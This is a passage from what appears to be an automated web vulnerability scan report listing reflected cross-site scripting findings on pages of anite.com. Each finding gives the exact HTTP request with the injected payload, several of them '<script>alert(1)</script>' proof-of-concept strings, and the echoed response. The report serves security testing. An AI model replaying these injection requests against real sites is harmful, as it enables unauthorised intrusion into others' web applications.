User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37228

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/search-mainmenu-15.html?searchword=%27&Itemid=1&4312b"><a>db93c8f56f2=1#up">
...[SNIP]...

1.206. http://anite.com/search-mainmenu-15.html [ordering parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/search-mainmenu-15.html

Issue detail

The value of the ordering request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0fdc"><a>0cd9716b140 was submitted in the ordering parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search-mainmenu-15.html?ordering=neweste0fdc"><a>0cd9716b140&searchword=%2500 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Referer: http://anite.com/search-mainmenu-15.html?searchword=%27&Itemid=1
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:25 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 32036

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/search-mainmenu-15.html?ordering=neweste0fdc"><a>0cd9716b140&searchword=%2500#up">
...[SNIP]...

1.207. http://anite.com/search-mainmenu-15.html [searchword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/search-mainmenu-15.html

Issue detail

The value of the searchword request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3cb6"><a>c8960e7d6ad was submitted in the searchword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search-mainmenu-15.html?searchword=%27c3cb6"><a>c8960e7d6ad&Itemid=1 HTTP/1.1
Host: anite.com
Proxy-Connection: keep-alive
Referer: http://anite.com/
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=188041464

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:08:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:08:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37160

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/search-mainmenu-15.html?searchword=%27c3cb6"><a>c8960e7d6ad&Itemid=1#up">
...[SNIP]...

1.208. http://anite.com/shareholder-communications [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/shareholder-communications

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9877d"><script>alert(1)</script>5a24589ffa4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shareholder-communications9877d"><script>alert(1)</script>5a24589ffa4 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:16:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/shareholder-communications9877d"><script>alert(1)</script>5a24589ffa4#up">
...[SNIP]...

1.209. http://anite.com/shareholder-communications [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/shareholder-communications

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd9d1"><a>afb849a31ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /shareholder-communications?dd9d1"><a>afb849a31ea=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:16:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:16:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/shareholder-communications?dd9d1"><a>afb849a31ea=1#up">
...[SNIP]...

1.210. http://anite.com/shareholder-communications.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/shareholder-communications.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53a51"><a>b2f0af2c5be was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /shareholder-communications.html?Itemid=48253a51"><a>b2f0af2c5be HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:20:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:20:09 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/shareholder-communications.html?Itemid=48253a51"><a>b2f0af2c5be#up">
...[SNIP]...

1.211. http://anite.com/shareholder-communications.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/shareholder-communications.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15f14"><script>alert(1)</script>e8f04dc71d5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /15f14"><script>alert(1)</script>e8f04dc71d5 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:20:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:20:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/15f14"><script>alert(1)</script>e8f04dc71d5#up">
...[SNIP]...

1.212. http://anite.com/shareholder-communications.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/shareholder-communications.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2736"><a>98819d190d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /shareholder-communications.html?d2736"><a>98819d190d0=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:20:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:20:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/shareholder-communications.html?d2736"><a>98819d190d0=1#up">
...[SNIP]...

1.213. http://anite.com/test-services.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/test-services.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 526b1"><a>b352045551c was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /test-services.html?Itemid=437526b1"><a>b352045551c HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:09:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/test-services.html?Itemid=437526b1"><a>b352045551c#up">
...[SNIP]...

1.214. http://anite.com/test-services.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/test-services.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d97fa"><script>alert(1)</script>bb7ad16cfc0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d97fa"><script>alert(1)</script>bb7ad16cfc0 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:09:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:42 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/d97fa"><script>alert(1)</script>bb7ad16cfc0#up">
...[SNIP]...

1.215. http://anite.com/test-services.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/test-services.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9430"><a>97f7eca632c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /test-services.html?f9430"><a>97f7eca632c=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:09:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:09:22 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/test-services.html?f9430"><a>97f7eca632c=1#up">
...[SNIP]...

1.216. http://anite.com/tour-operator-software.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/tour-operator-software.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8674e"><script>alert(1)</script>30c7cdec600 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /8674e"><script>alert(1)</script>30c7cdec600 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:14:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/8674e"><script>alert(1)</script>30c7cdec600#up">
...[SNIP]...

1.217. http://anite.com/tour-operator-software.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/tour-operator-software.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbdbf"><a>a7e3a3fc0c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tour-operator-software.html?dbdbf"><a>a7e3a3fc0c8=1 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:13:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:13:52 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/tour-operator-software.html?dbdbf"><a>a7e3a3fc0c8=1#up">
...[SNIP]...

1.218. http://anite.com/travel-customers.html [Itemid parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/travel-customers.html

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad8c2"><a>aa1fa17549 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-customers.html?Itemid=260ad8c2"><a>aa1fa17549 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 200 OK
Date: Thu, 25 Nov 2010 15:14:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:14:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/travel-customers.html?Itemid=260ad8c2"><a>aa1fa17549#up">
...[SNIP]...

1.219. http://anite.com/travel-customers.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://anite.com
Path:	/travel-customers.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bac7f"><script>alert(1)</script>36ff6357d80 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bac7f"><script>alert(1)</script>36ff6357d80 HTTP/1.1
Host: anite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 87835e346e677cb58ad6bcdf7d06efda=kjo2h7tgjcq97eiml3qetumrr2; __utmz=188041464.1290696129.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=188041464.270592639.1290696129.1290696129.1290696129.1; __utmc=188041464; __utmb=188041464;

Response

HTTP/1.0 404 NOT FOUND
Date: Thu, 25 Nov 2010 15:15:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 25 Nov 2010 15:15:10 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8

<?xml version="1.0" encoding="utf-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="http://anite.com/bac7f"><script>alert(1)</script>36ff6357d80#up">
...[SNIP]...

1.220. http://anite.com/travel-customers.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://anite.com
Path:	/travel-customers.html

Issue detail

